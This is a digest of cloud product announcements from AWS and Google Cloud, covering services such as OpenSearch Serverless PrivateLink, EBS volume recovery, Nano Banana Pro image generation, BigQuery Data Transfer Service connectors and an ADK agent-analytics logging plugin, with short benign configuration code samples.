Amazon OpenSearch Serverless now supports AWS PrivateLink for secure, private connectivity to its management console and APIs. With AWS PrivateLink, you can establish a private connection between your virtual private cloud (VPC) and Amazon OpenSearch Serverless to create, manage, and configure your OpenSearch Serverless resources without traversing the public internet. By enabling private network connectivity, this enhancement eliminates the need to use public IP addresses or rely solely on firewall rules to access OpenSearch Serverless. With this release, OpenSearch Serverless management operations can be accessed securely through PrivateLink. Data ingestion and query operations on collections still require the OpenSearch Serverless-provided VPC endpoint configuration for private connectivity, as described in the OpenSearch Serverless VPC developer guide.
You can use PrivateLink connections in all AWS Regions where Amazon OpenSearch Serverless is available. Creating VPC endpoints on AWS PrivateLink will incur additional charges; refer to the AWS PrivateLink pricing page for details. You can get started by creating an AWS PrivateLink interface endpoint for Amazon OpenSearch Serverless using the AWS Management Console, AWS Command Line Interface (CLI), AWS Software Development Kits (SDKs), AWS Cloud Development Kit (CDK), or AWS CloudFormation. To learn more, refer to the documentation on creating an interface VPC endpoint for the management console.
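For example, a minimal boto3 sketch for creating the interface endpoint might look like the following; the service name shown for the OpenSearch Serverless management API is an assumption, so confirm it with describe_vpc_endpoint_services in your Region.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Create an interface VPC endpoint for the OpenSearch Serverless management API.
# The service name below is an assumption; list the available services with
# ec2.describe_vpc_endpoint_services() and use the OpenSearch Serverless entry.
response = ec2.create_vpc_endpoint(
    VpcEndpointType="Interface",
    VpcId="vpc-0123456789abcdef0",                    # your VPC
    ServiceName="com.amazonaws.us-east-1.aoss-api",   # assumed service name
    SubnetIds=["subnet-0123456789abcdef0"],
    SecurityGroupIds=["sg-0123456789abcdef0"],
    PrivateDnsEnabled=True,
)
print(response["VpcEndpoint"]["VpcEndpointId"])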
Recycle Bin for Amazon EBS, which helps you recover accidentally deleted snapshots and EBS-backed AMIs, now supports EBS volumes. If you accidentally delete a volume, you can now recover it directly from Recycle Bin instead of restoring from a snapshot, eliminating data loss between the last snapshot and deletion and reducing your recovery point objective. A recovered volume immediately delivers full performance, without waiting for data to download from snapshots.
To use Recycle Bin, you create retention rules that enable it for all volumes or for specific volumes, using tags to target which volumes to protect. You set a retention period for deleted volumes and can recover any volume within that period. Recovered volumes are immediately available and retain all attributes, including tags, permissions, and encryption status. Volumes that are not recovered are permanently deleted when the retention period expires.
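As a rough boto3 sketch, a tag-scoped retention rule for volumes could be created as follows; the "EBS_VOLUME" resource type string is an assumption by analogy with the existing "EBS_SNAPSHOT" value, so verify it against the Recycle Bin API reference.

import boto3

rbin = boto3.client("rbin", region_name="us-east-1")

# Keep deleted volumes tagged Team=analytics in the Recycle Bin for 14 days.
# "EBS_VOLUME" is assumed by analogy with "EBS_SNAPSHOT"; check the API reference.
rule = rbin.create_rule(
    RetentionPeriod={"RetentionPeriodValue": 14, "RetentionPeriodUnit": "DAYS"},
    Description="Recover accidentally deleted analytics volumes",
    ResourceType="EBS_VOLUME",
    ResourceTags=[{"ResourceTagKey": "Team", "ResourceTagValue": "analytics"}],
)
print(rule["Identifier"])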
EBS volumes in Recycle Bin are billed at the same rate as regular EBS volumes; see the pricing page for details. To get started, read the documentation. The feature is now available through the AWS Command Line Interface (CLI), AWS SDKs, and the AWS Console in all AWS commercial, China, and AWS GovCloud (US) Regions.
Earlier this year we launched Nano Banana (Gemini 2.5 Flash Image). It became the top rated image model in the world, and we were excited to see the overwhelming response from our customers. Nano Banana made it dramatically easier – and more fun – to edit images with natural language and make visuals with consistent characters.
Today, we’re announcing Nano Banana Pro (Gemini 3 Pro Image), our state-of-the-art image generation and editing model, available starting today in Vertex AI and Google Workspace, and coming soon to Gemini Enterprise. Nano Banana Pro excels in visual design, world knowledge, and text generation, making it easier for enterprises to:
Deploy localized global campaigns faster. The model supports text rendering in multiple languages. You can even take an image and translate the text inside it, so your creative work is ready for other countries immediately.
Create more accurate, context-rich visual assets. Because Nano Banana Pro connects to Google Search, it understands the real world context. This means you can generate maps, diagrams, and infographics that get the facts and details right — perfect for training manuals or technical guides where accuracy matters.
Maintain stronger creative control and brand fidelity. Keeping brand, product, or character consistency is often the biggest challenge when using AI for creative assets. Nano Banana Pro keeps your creative team in the driver’s seat with our expanded visual context window. Think of this as “few-shot prompting” for designers: by allowing you to upload up to 14 reference images, you can now load a full style guide simultaneously—including logos, color palettes, character turnarounds, and product shots. This ensures the model has the complete context needed to match your brand identity. Need to refine the result? Just describe the change using natural language to add, remove, or replace details. Nano Banana Pro supports up to 4K images for a higher level of detail and sharpness across multiple aspect ratios.
Nano Banana Pro and Nano Banana are designed to power a complete creative workflow. Start with Nano Banana for high-velocity ideation, then transition to Nano Banana Pro when you need the highest fidelity for production-ready assets.
Supporting your commercial needs: Both models fall under our shared responsibility framework, and you can ensure transparency and responsible use with built-in SynthID watermarking on every generated asset. We’re committed to supporting your commercial needs with copyright indemnification coming at general availability.
Prompt: Translate all the English text on the three yellow and blue cans into Korean, while keeping everything else the same
Search grounding: Nano Banana Pro can use Google Search to research topics based on your query, and reason on how to present factual and grounded information.
Prompt: Create an infographic that shows how to make elaichi chai.
Advanced composition: Add up to 14 input reference images to combine elements, blend scenes, and transfer designs to create something entirely new. Nano Banana Pro maintains the quality of a developed asset but delivers it in minutes.
Prompt: Editorial style photo, female model is wearing jeans, yellow top with polka dots, headband, red heels, black bag on her arm. She is holding an iced matcha latte in one hand and in the other hand she is holding a leash on a chow chow dog. She is standing in front of the house in Beverly Hills, looking into the camera. Respect the overall aesthetic and color palette of the photo with the house. There is a white logo “Love Letters” with 10% opacity shadow in the lower left corner.
Advanced text rendering: Generate clear, accurate text within images, unlocking use cases for product mockups, posters, and educational diagrams. This could include natural text placement (e.g., wrapping text around an object) and support for various fonts and styles.
Prompt: Create an image showing the phrase “How much wood would a woodchuck chuck if a woodchuck could chuck wood” made out of wood chucked by a woodchuck.
Powering the platforms that power creatives
Nano Banana Pro is becoming an essential infrastructure layer for the creative economy, powering the design platforms that creatives rely on. By integrating our models directly into their workflows, we are helping industry leaders like Adobe, Figma, and Canva deliver next-generation AI capabilities. Here’s what they have to say about building on our foundation:
“With Google’s Nano Banana Pro now in Adobe Firefly and Photoshop, we’re giving creators and creative professionals yet another best-in-class image model they can tap into alongside Adobe’s powerful editing tools to turn ideas into high-impact content with full creative control. It’s an exciting step in our partnership with Google to help everyone create with AI.” — Hannah Elsakr, vice president, New Gen AI Business Ventures, Adobe
“Nano Banana Pro is a revolution for AI image editing. We’ve been surprised and amazed by its visual powers and prompt understanding. One key upgrade is its ability to translate and render text across multiple languages; which is very important as we work to empower the world to design anything at Canva.” — Danny Wu, Head of AI Products at Canva
“With Nano Banana Pro in Figma, designers gain a tool that is creative and precise at the same time, producing perspective shifts, lighting changes, and full scene variations with dependable style and character consistency.” — Loredana Crisan, Chief Design Officer, Figma
“At Photoroom we serve some of the largest fashion marketplaces and retailers in the world, empowering brands to visualize future collections instantly and bring products to market faster. Leveraging Nano Banana Pro, we’ve enhanced our Virtual Fashion Model and Change Fabric Color workflow to make apparel transformation more flexible and realistic than ever.” — Matt Rouif, CEO, Photoroom
The world’s leading agencies and brands are delivering results
We’re moving from experimentation to enterprise-grade production, where efficiency and performance shine.
“This model makes product-based image editing much easier. After testing multi-product swaps, it handled complex edits with impressive coherence and minimal prompt fuss. It’s incredibly scalable for creative teams who care about quality and speed.” — Juliette Suvitha, Head of Creative at Pencil
“HubX is using Nano Banana Pro to edit, retouch, expand, and upscale photos with AI — delivering significant improvements in identity preservation, context awareness, and output resolution quality. It’s allowing anyone, regardless of technical background, to create professional-grade visuals effortlessly.” — Kaan Ortabas, Co-Founder, HubX
“The new Nano Banana Pro model has completely eliminated the friction between idea and execution. Imagination is now the only limitation. This newfound creative velocity isn’t just theory either, it’s already powering our marketing asset production.” — David Sandström, CMO, Klarna
“Nano Banana Pro is a step forward in quality and can help us unlock even better image generation for merchants.” — Matthew Koenig, Senior Staff Product Manager, Shopify
“Our early Nano Banana Pro tests are impressive. It integrates smoothly into our pipeline and delivers noticeably better quality. Lighting feels real, scenes more natural, and product accuracy sharper. This is a meaningful step forward in visual content creation.” – Bryan Godwin, Director, Visual AI, Wayfair
“WPP received early access to Nano Banana Pro in WPP Open, through our expanded AI partnership. The model has already impacted creative and production workflows, with tests performed for our clients such as Verizon allowing us to translate creative concepts to assets with speed and scale. Improvements in text fidelity and reasoning allow us to push the boundaries of Generative Media for more complex use cases, such as product infographics and localization. We’re so excited to bring the power of this model and our Google partnership to our shared clients.” — Elav Horwitz, Chief Innovation Officer, WPP
We’re making Nano Banana Pro available where your teams already work, keeping you in the driver’s seat:
For developers: You can start building with Nano Banana Pro today via the Gemini API in Vertex AI. For those building with Vertex AI, Nano Banana Pro is an enterprise-grade offering that includes Provisioned Throughput, Pay As You Go, and advanced safety filters.
For business teams: Nano Banana is available in Gemini Enterprise, with Nano Banana Pro coming soon. Gemini Enterprise is our advanced agentic platform that brings the best of Google AI to every employee, for every workflow. And, starting today, Nano Banana Pro is rolling out to Google Workspace customers in Google Slides, Vids, the Gemini app, and NotebookLM — learn more.
With BigQuery, our goal is to allow you to extract valuable insights from your data, regardless of how much there is, or where it’s from. A key part of how we do this is our BigQuery Data Transfer Service, which automates and streamlines data loading into BigQuery from a wide variety of sources.
As a fully managed service, BigQuery Data Transfer Service offers a variety of benefits:
Simplicity: Eliminate the need for infrastructure management or complex coding. Whether you use the UI, API, or CLI, getting started with data loading is easy (see the client-library sketch after this list).
Scalability: Used by tens of thousands of customers each month, Data Transfer Service easily handles massive data volumes and high numbers of concurrent users, accommodating demanding data transfer jobs.
Security: Your data’s safety is paramount. Data Transfer Service employs robust security measures like encryption, authentication, and authorization. And as you’ll see below, we’ve significantly expanded its ability to support regulated workloads without compromising ease of use.
Cost-effectiveness: Many first-party connectors, like those for Google Ads and YouTube, are provided at no cost. And for a growing list of third-party connectors, we offer consumption-based pricing that’s highly price-competitive, so you can unify your data cost-effectively.
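To make the simplicity point above concrete, here is a minimal sketch that creates a transfer configuration with the google-cloud-bigquery-datatransfer Python client; the data source ID and params shown are illustrative assumptions, and each connector documents its own values.

from google.cloud import bigquery_datatransfer

client = bigquery_datatransfer.DataTransferServiceClient()

# Data source IDs and params differ per connector; "google_ads" and "customer_id"
# below are illustrative placeholders -- check the docs for your connector.
transfer_config = bigquery_datatransfer.TransferConfig(
    destination_dataset_id="marketing_dataset",
    display_name="Daily Google Ads load",
    data_source_id="google_ads",
    params={"customer_id": "123-456-7890"},
    schedule="every 24 hours",
)

created = client.create_transfer_config(
    parent=client.common_project_path("my-project"),
    transfer_config=transfer_config,
)
print(f"Created transfer config: {created.name}")

Once created, the service runs the transfer on the schedule you specify and loads the results into the destination dataset.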
Based on your feedback, we’ve expanded the BigQuery Data Transfer Service connector ecosystem, enhanced security and compliance, and improved the overall user experience. Let’s dive into the latest updates.
Key feature updates
Expanded data connectivity
We are thrilled to announce that several highly-requested connectors are now generally available:
Oracle: Integrate your key operational databases with BigQuery for enhanced analysis and reporting.
Salesforce and ServiceNow: Build unified customer profiles and bring in your IT service management data to gain operational insights.
Salesforce Marketing Cloud (SFMC) and Facebook Ads: Ingest your marketing and analytics data into BigQuery for comprehensive analysis and campaign optimization.
Google Analytics 4 (GA4): A major milestone for marketing analytics; you can now build production marketing analysis pipelines with GA4 data.
These new additions join the quickly growing list of existing connectors, including Amazon S3, Amazon Redshift, Azure Blob Storage, Campaign Manager, Cloud Storage, Comparison Shopping Service (CSS) Center, Display & Video 360, Google Ad Manager, Google Ads, Google Merchant Center, Google Play, MySQL, PostgreSQL, Search Ads 360, Teradata, YouTube Channel, and YouTube Content Owner.
New connectors in preview
We are also excited to launch new connectors in preview, further expanding our ecosystem:
Stripe and PayPal: Ingest financial and transaction data into BigQuery for revenue analysis, refund tracking, and customer behavior insights.
Snowflake (migration connector): Migrate your data from Snowflake with features like key pair authentication, auto schema detection, and support for migrating data residing on all three major clouds (Google Cloud, AWS, and Azure).
Hive managed tables (migration connector): This connector supports metadata and table migration for Hive and Iceberg from on-premises and self-hosted cloud Hadoop environments to Google Cloud. It lets you perform one-time migrations and synchronize incremental updates of Hive and Iceberg tables, with Iceberg tables registered with BigLake metastore, and Iceberg and Hive tables registered with Dataproc Metastore.
Enhancements to existing connectors and platform capabilities
Google Cloud Storage: We are excited to announce the GA of event-driven transfers. Now, your data transfers can trigger automatically the moment a new file arrives in your Cloud Storage bucket, for near-real-time data pipelines.
Salesforce: CRM users get an efficiency boost with incremental ingestion now available in preview. Data Transfer Service now intelligently loads only new or modified records, saving time and compute resources.
SA360: The recently updated Search Ads 360 connector now includes full support for Performance Max (PMax) campaigns, so you can analyze data from Google’s latest campaign types.
Google Ad Manager: We improved data freshness for the Google Ad Manager connector by rolling out incremental updates for Data Transfer (DT) files. As Google Ad Manager adds new DT files to the Cloud Storage bucket, a transfer run incrementally loads only the new files into the BigQuery table, without reloading files that have already been transferred.
Oracle: We significantly enhanced the Oracle connector to support the ingestion of tables containing millions of records, ensuring that even your largest and most critical datasets can be transferred to BigQuery.
Enhanced security and compliance
To continue to meet your stringent security and compliance needs, we’re also investing in our infrastructure.
Access transparency: Along with BigQuery, we’ve extended Data Transfer Service administrative access controls to customer-identifiable metadata. Administrative access controls (access transparency, access approval, and personnel controls) are Cloud features that give customers real-time notifications of when, why, and how Google personnel access their user content. This new capability applies access transparency controls to reads of customer-defined attributes and any customer service configuration that may be used to identify the customer or customer workloads.
EU Data Boundary: We are excited to announce the GA of Data Transfer Service for the EU Data Boundary and Sovereign Controls compliance programs in the EU, including support for EU regions with Data Boundary with Access Justifications and Sovereign Controls by Partners. This enables customers to expand their workloads on Google Cloud in regulated markets.
FedRAMP High: We successfully implemented the security controls required to launch Data Transfer Service into the FedRAMP High compliance regime. This will allow U.S. government, civilian agencies, and contractors to expand their adoption of FedRAMP High regulated workloads on Google Cloud.
CJIS Compliance: We launched BigQuery Data Transfer Service for Criminal Justice Information Services (CJIS) compliance. Data Transfer Service now meets the security standards of the CJIS Security Policy, enabling U.S. state, local, and tribal law enforcement and criminal justice organizations to handle sensitive information using our service.
Custom organization policies: We announced the GA of custom organization policies so you can allow or deny specific operations on Data Transfer Service transfer configurations, to help meet your organization’s compliance and security requirements.
Regional endpoints: We enabled regional endpoints for the Data Transfer Service API. Regional endpoints are request endpoints that ensure requests are only processed if the resource exists in the specified location. This way, workloads can comply with data residency and data sovereignty requirements by maintaining data at rest and in transit within the specified location.
Key tracking: You can now use key usage tracking to see which storage resources are protected by each of your Cloud KMS keys. For more information, learn how to view key usage.
Proactive threat mitigation: We recently completed a detailed, proactive threat modeling exercise for the entire BigQuery Data Transfer Service. This in-depth review allowed us to identify and mitigate high-priority security risks, further hardening the platform against potential threats.
An intuitive and unified user experience
We’ve made significant investments in the BigQuery user experience to make data ingestion simpler and more intuitive.
The “Add Data” experience in the BigQuery UI now provides a single, simplified entry point to guide you through the data-loading process. Whether you’re a seasoned data engineer or a new analyst, this wizard-like workflow makes it easy to discover and configure transfers from any source, removing the guesswork and getting you to insights faster.
Finally, to further streamline the setup process, the BigQuery Data Transfer Service API is now enabled by default for new BigQuery projects. This removes a manual step, so that data transfer capabilities are immediately available to everyone getting started with BigQuery.
A new, consumption-based pricing model
As we graduate more third-party connectors from preview to GA, we introduced a new pricing model that reflects their status as fully supported, production-ready services.
This new consumption-based model applies to our third-party SaaS and database connectors (e.g., Salesforce, Facebook Ads, Oracle, MySQL, and others) and takes effect only when a specific connector becomes generally available.
Key details of the model:
Free in preview: All connectors remain completely free of charge during the preview phase. This allows you to test, experiment, and validate new integrations without any financial commitment.
Competitive pricing: Pricing is highly competitive, to help you feel comfortable loading data from critical sources.
Consumption-based: You are billed based on the compute resources consumed by your data transfers, measured in slot-hours.
This change allows us to continue investing in building a robust and scalable data transfer platform. For more detailed information, please visit the official BigQuery pricing page.
Looking ahead
The journey continues! We are committed to building features that streamline your data pipelines and unlock new levels of insight. As you can see from the extensive new list of connectors in preview, we are continuing to innovate rapidly in migration, marketing analytics, operational databases, and enterprise applications.
Experience the power of BigQuery Data Transfer Service for yourself. Simplify your data loading process and accelerate your time to insights. Want to stay informed about the BigQuery Data Transfer Service? Join our email group for future product announcements and updates at https://groups.google.com/g/bigquery-dts-announcements.
In a world of agentic AI, building an agent is only half the battle. The other half is understanding how users are interacting with it. What are their most common requests? Where do they get stuck? What paths lead to successful outcomes? Answering these questions is the key to refining your agent and delivering a better user experience. These insights are also super critical for optimizing agent performance.
Today, we’re making it easier for agent developers in Google’s Agent Development Kit (ADK) to answer these questions. With a single line of code, ADK developers can stream agent interaction data directly to BigQuery and get insights into their agent activity in a scalable manner. To do so, we are introducing BigQuery Agent Analytics, a new plugin for ADK that exports your agent’s interaction data directly into BigQuery to capture, analyze, and visualize agent performance, user interaction, and cost.
With your agent interaction data centralized in BigQuery, analyzing critical metrics such as latency, token consumption, and tool usage is straightforward. Creating custom dashboards in tools like Looker Studio or Grafana is easy. Furthermore, you can leverage cutting-edge BigQuery capabilities including generative AI functions, vector search, and embedding generation to perform sophisticated analysis. This enables you to cluster agent interactions, precisely gauge agent performance, and rapidly pinpoint common user queries or systemic failure patterns — all of which are essential for refining the agent experience. You can also join interaction data with relevant business datasets — for instance, linking support agent interactions with CSAT scores — to accurately measure the agent’s real-world impact. This entire capability is unlocked with a minimal code change.
This plugin is available in preview for ADK users today, with support for other agent frameworks soon to follow.
See the plugin in action in the following video.
Understanding BigQuery Agent Analytics
The BigQuery Agent Analytics plugin is a lightweight way to stream agent activity data directly to a BigQuery table. It consists of three main components:
ADK Plugin: With a single line of code, the new ADK plugin can stream agent activity such as requests, responses, and LLM tool calls to a BigQuery table.
Predefined BigQuery schema: We provide an optimized table schema out of the box that stores rich details about user interactions, agent responses, and tool usage.
Low-cost, high-performance streaming: The plugin uses the BigQuery Storage Write API to stream events directly to BigQuery in real time.
Why it matters: Data-driven agent development
By integrating your agent’s analytic data in BigQuery, you can go from viewing basic metrics to generating deep, actionable insights. Specifically, this integration lets you:
Visualize agent usage and interactions: Gain a clear understanding of your agent’s performance. Easily track key operational metrics like token consumption and tool usage to monitor costs and resource allocation.
Evaluate agent quality with advanced AI: Go beyond simple metrics by using BigQuery’s advanced AI capabilities. Leverage AI functions and vector search to perform quality analysis on conversation data, identifying areas for improvement with greater precision.
Learn by conversing with your agent data: Create a conversational data agent that works directly with your new observability data. This allows you and your team to ask questions about your agent activity in natural language and get immediate insights, without writing complex queries.
How It works
We’ve designed the process of setting up a robust analytics pipeline to be as simple as possible:
1. Add the required code: This plugin requires the use of ADK’s application (apps) component when building the agent. The following code demonstrates how to initialize the new plugin and make it part of your app.
# Initialize the plugin
bq_logging_plugin = BigQueryAgentAnalyticsPlugin(
    project_id=PROJECT_ID,
    dataset_id=DATASET_ID,
    table_id="agent_events"  # Optional
)

# Initialize the model and the root agent
llm = Gemini(
    model="gemini-2.5-flash",
)

root_agent = Agent(
    model=llm,
    name="my_adk_agent",
    instruction="You are a helpful assistant"
)

# Create the app and register the plugin
app = App(
    name="my_adk_agent",
    root_agent=root_agent,
    plugins=[bq_logging_plugin],  # Register the plugin here
)
2. Choose what to stream and customize pre-processing: You have full control over what data you send to BigQuery. Choose the specific events you want to stream, so that you only capture the data that is most relevant to your needs. The following code example redacts dollar amounts before logging.
import json
import re
from typing import Any

from google.adk.plugins.bigquery_agent_analytics_plugin import BigQueryLoggerConfig


def redact_dollar_amounts(event_content: Any) -> str:
    """
    Custom formatter to redact dollar amounts (e.g., $600, $12.50)
    and ensure JSON output if the input is a dict.
    """
    if isinstance(event_content, dict):
        text_content = json.dumps(event_content)
    else:
        text_content = str(event_content)

    # Regex to find dollar amounts: $ followed by digits, optionally with commas or decimals.
    # Examples: $600, $1,200.50, $0.99
    redacted_content = re.sub(r'\$\d+(?:,\d{3})*(?:\.\d+)?', 'xxx', text_content)
    return redacted_content


config = BigQueryLoggerConfig(
    enabled=True,
    event_allowlist=["LLM_REQUEST", "LLM_RESPONSE"],  # Only log these events
    shutdown_timeout=10.0,       # Wait up to 10s for logs to flush on exit
    client_close_timeout=2.0,    # Wait up to 2s for the BigQuery client to close
    max_content_length=500,      # Truncate content to 500 chars (default)
    content_formatter=redact_dollar_amounts,  # Redact dollar amounts in the logged content
)

plugin = BigQueryAgentAnalyticsPlugin(..., config=config)
And that’s it — the plugin handles the rest, including auto-creating the necessary BigQuery table with the correct schema, and streaming the agent data in real-time.
Now you are ready to analyze your agent metrics, using familiar BigQuery semantics. Here is an illustration of your logs as they appear in the BigQuery table using a “select * limit 10” on non-empty columns.
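As a hedged illustration, here is how you might run an aggregate query over that table from Python with the google-cloud-bigquery client; the column names are assumptions based on the kinds of fields described above, so check your table's schema for the exact names.

from google.cloud import bigquery

client = bigquery.Client(project="my-project")

# Column names (event_type, total_token_count, event_timestamp) are assumptions
# based on the schema described above; inspect your agent_events table to confirm.
query = """
    SELECT
      event_type,
      COUNT(*) AS events,
      SUM(total_token_count) AS total_tokens
    FROM `my-project.my_dataset.agent_events`
    WHERE event_timestamp >= TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 7 DAY)
    GROUP BY event_type
    ORDER BY events DESC
"""
for row in client.query(query).result():
    print(row.event_type, row.events, row.total_tokens)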
Get started today
It’s time to unlock the full potential of your agents. With the new BigQuery Agent Analytics plugin you can answer critical usage questions to refine your agent, optimize performance, and deliver a superior user experience. There is more to come in the near future, including integration with LangGraph and advanced analysis for multimodal agent interactions.
AWS announces the general availability of Cloud WAN Routing Policy, which provides customers with fine-grained controls to optimize route management, control traffic patterns, and customize network behavior across their global wide-area networks.
AWS Cloud WAN allows you to build, monitor, and manage a unified global network that interconnects your resources in the AWS cloud and your on-premises environments. Using the new Routing Policy feature, customers can perform advanced routing techniques such as route filtering and summarization for better control over the routes exchanged between AWS Cloud WAN and external networks. This feature enables customers to build controlled routing environments that minimize the route reachability blast radius, prevent sub-optimal or asymmetric connectivity patterns, and avoid overrunning route tables with unnecessary route propagation in global networks. In addition, customers can set advanced Border Gateway Protocol (BGP) attributes to customize network traffic behavior to their individual needs and build highly resilient hybrid-cloud network architectures. The feature also provides advanced visibility into the routing databases, allowing rapid troubleshooting of network issues in complex multi-path environments.
The new Routing Policy feature is available in all AWS Regions where AWS Cloud WAN is available. You can enable these features using the AWS Management Console, AWS Command Line Interface (CLI) and the AWS Software Development Kit (SDK). There is no additional charge for enabling Routing Policy on AWS Cloud WAN. For more information, see the AWS Cloud WAN documentation pages.
AWS Glue now supports full snapshot and incremental load ingestion for new SAP entities using zero-ETL integrations. This enhancement introduces full snapshot data ingestion for SAP entities that lack complete change data capture (CDC) functionality, while also providing incremental data loading capabilities for SAP entities that don’t support the Operational Data Provisioning (ODP) framework. These new features work alongside existing capabilities for ODP-supported SAP entities, to give customers the flexibility to implement zero-ETL data ingestion strategies across diverse SAP environments.
Fully managed AWS zero-ETL integrations eliminate the engineering overhead associated with building custom ETL data pipelines. This new zero-ETL functionality enables organizations to ingest data from multiple SAP applications into Amazon Redshift or the lakehouse architecture of Amazon SageMaker to address scenarios where SAP entities lack deletion tracking flags or don’t support the Operational Data Provisioning (ODP) framework. Through full snapshot ingestion for entities without deletion tracking and timestamp-based incremental loading for non-ODP systems, zero-ETL integrations reduce operational complexity while saving organizations weeks of engineering effort that would otherwise be required to design, build, and test custom data pipelines across diverse SAP application environments.
This feature is available in all AWS Regions where AWS Glue zero-ETL is currently available.
Amazon Braket now supports spending limits, enabling customers to set spending caps on quantum processing units (QPUs) to manage costs. With spending limits, customers can define maximum spending thresholds on a per-device basis, and Amazon Braket automatically validates that each task submission doesn’t exceed the pre-configured limits. Tasks that would exceed remaining budgets are rejected before creation. For comprehensive cost management across all of Amazon Web Services, customers should continue to use the AWS Budgets feature as part of AWS Cost Management.
Spending limits are particularly valuable for research institutions managing quantum computing budgets across multiple users, for educational environments preventing accidental overspending during coursework, and for development teams experimenting with quantum algorithms. Customers can update or delete spending limits at any time as their requirements change. Spending limits apply only to on-demand tasks on quantum processing units and do not include costs for simulators, notebook instances, hybrid jobs, or tasks created during Braket Direct reservations.
Spending limits are available now in all AWS Regions where Amazon Braket is supported at no additional cost. Researchers at accredited institutions can apply for credits to support experiments on Amazon Braket through the AWS Cloud Credits for Research program. To get started, visit the Spending limits page in the Amazon Braket console and read our launch blog post.
Starting today, customers can run Apple macOS Tahoe (version 26) on Amazon EC2 Mac instances using Amazon Machine Images (AMIs). Apple macOS Tahoe is the latest major macOS version and introduces multiple new features and performance improvements over prior macOS versions, including support for Xcode version 26.0 or later (which includes the latest SDKs for iOS, iPadOS, macOS, tvOS, watchOS, and visionOS).
Backed by Amazon Elastic Block Store (EBS), EC2 macOS AMIs are AWS-supported images that are designed to provide a stable, secure, and high-performance environment for developer workloads running on EC2 Mac instances. EC2 macOS AMIs include the AWS Command Line Interface, Command Line Tools for Xcode, Amazon SSM Agent, and Homebrew. The AWS Homebrew Tap includes the latest versions of AWS packages included in the AMIs.
Apple macOS Tahoe AMIs are available for Apple silicon EC2 Mac instances and are published to all AWS regions where Apple silicon EC2 Mac instances are available today. Customers can get started with macOS Tahoe AMIs via the AWS Console, Command Line Interface (CLI), or API. Learn more about EC2 Mac instances here or get started with an EC2 Mac instance here. You can also subscribe to EC2 macOS AMI release notifications here.
Amazon MSK is a fully managed service for Apache Kafka and Kafka Connect that makes it easier for you to build and run applications that use Apache Kafka as a data store. Amazon MSK Serverless is a cluster type for Amazon MSK that allows you to run Apache Kafka without having to manage and scale cluster capacity. MSK Serverless automatically provisions and scales compute and storage resources, so you can use Apache Kafka on demand.
With these launches, Amazon MSK Serverless is now generally available in Asia Pacific (Sydney), Asia Pacific (Singapore), Asia Pacific (Mumbai), Asia Pacific (Tokyo), Asia Pacific (Seoul), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (Stockholm), Europe (Paris), Europe (London), South America (São Paulo), US East (N. Virginia), US East (Ohio), and US West (Oregon) AWS regions. To learn more and get started, see our developer guide.
Amazon MQ now supports RabbitMQ version 4.2, which introduces native support for the AMQP 1.0 protocol, a new Raft-based metadata store named Khepri, local shovels, and message priorities for quorum queues. RabbitMQ 4.2 also includes various bug fixes and performance improvements for throughput and memory management.
A key highlight of RabbitMQ 4.2 is support for AMQP 1.0 as a core protocol, offering enhanced features like the modified outcome, which allows consumers to modify message annotations before requeueing or dead-lettering, and granular flow control, which lets a client application dynamically adjust how many messages it receives from a specific queue. Amazon MQ has also introduced configurable resource limits for RabbitMQ 4.2 brokers, which you can modify based on your application requirements. Starting from RabbitMQ 4.0, mirroring of classic queues is no longer supported; non-replicated classic queues are still supported. Quorum queues are the only replicated and durable queue type supported on RabbitMQ 4.2 brokers, and they now offer message priorities in addition to consumer priorities.
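For illustration, here is a minimal Python sketch that declares a quorum queue and publishes a prioritized message using the pika client (AMQP 0-9-1 rather than the new AMQP 1.0 support); the broker endpoint and credentials are placeholders.

import pika

# Amazon MQ RabbitMQ brokers expose AMQPS on port 5671; the URL below is a placeholder.
params = pika.URLParameters("amqps://app_user:app_password@b-1234-example.mq.us-east-1.amazonaws.com:5671")
connection = pika.BlockingConnection(params)
channel = connection.channel()

# Quorum queues are the only replicated, durable queue type on RabbitMQ 4.2 brokers.
channel.queue_declare(
    queue="orders",
    durable=True,
    arguments={"x-queue-type": "quorum"},
)

# Message priorities are now honored by quorum queues, alongside consumer priorities.
channel.basic_publish(
    exchange="",
    routing_key="orders",
    body=b"expedite this order",
    properties=pika.BasicProperties(priority=5, delivery_mode=2),
)
connection.close()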
To start using RabbitMQ 4.2 on Amazon MQ, simply select RabbitMQ 4.2 when creating a new broker with the m7g instance type through the AWS Management Console, AWS CLI, or AWS SDKs. Amazon MQ automatically manages patch version upgrades for your RabbitMQ 4.2 brokers, so you only need to specify the major.minor version. To learn more about the changes in RabbitMQ 4.2, see the Amazon MQ release notes and the Amazon MQ developer guide. This version is available in all AWS Regions where Amazon MQ m7g instance types are available today.
Amazon EC2 now supports Microsoft SQL Server 2025 with License-Included (LI) Amazon Machine Images (AMIs), providing a quick way to launch the latest version of SQL Server. By running SQL Server 2025 on Amazon EC2, customers can take advantage of the security, performance, and reliability of AWS with the latest SQL Server features.
Amazon creates and manages Microsoft SQL Server 2025 AMIs to simplify the provisioning and management of SQL Server 2025 on EC2 Windows instances. These images support version 1.3 of the Transport Layer Security (TLS) protocol by default for enhanced performance and security. These images also come with pre-installed software such as AWS Tools for Windows PowerShell, AWS Systems Manager, AWS CloudFormation, and various network and storage drivers to make your management easier.
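As a hedged sketch, you could locate the new images from Python by walking the public Windows AMI parameter namespace in AWS Systems Manager; the "SQL_2025" naming pattern used in the filter below is an assumption, so inspect the returned parameter names to confirm.

import boto3

ssm = boto3.client("ssm", region_name="us-east-1")

# Walk the public Windows AMI parameter namespace and keep anything that looks
# like a SQL Server 2025 image. The "SQL_2025" substring is an assumed naming
# pattern; print the names to verify before automating against them.
paginator = ssm.get_paginator("get_parameters_by_path")
for page in paginator.paginate(Path="/aws/service/ami-windows-latest"):
    for param in page["Parameters"]:
        if "SQL_2025" in param["Name"]:
            print(param["Name"], "->", param["Value"])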
SQL Server 2025 AMIs are available in all commercial AWS Regions and the AWS GovCloud (US) Regions.
To learn more about the new AMIs, see SQL Server AMIs User Guide or read the blog post.
Application Load Balancer (ALB) now offers Target Optimizer, a new feature that allows you to enforce a maximum number of concurrent requests on a target.
With Target Optimizer, you can fine-tune your application stack so that targets receive only the number of requests they can process, achieving a higher request success rate, higher target utilization, and lower latency. This is particularly useful for compute-intensive workloads. For example, if you have applications that perform complex data processing or inference, you can configure each target to receive as few as one request at a time, ensuring the number of concurrent requests is in line with the target’s processing capabilities.
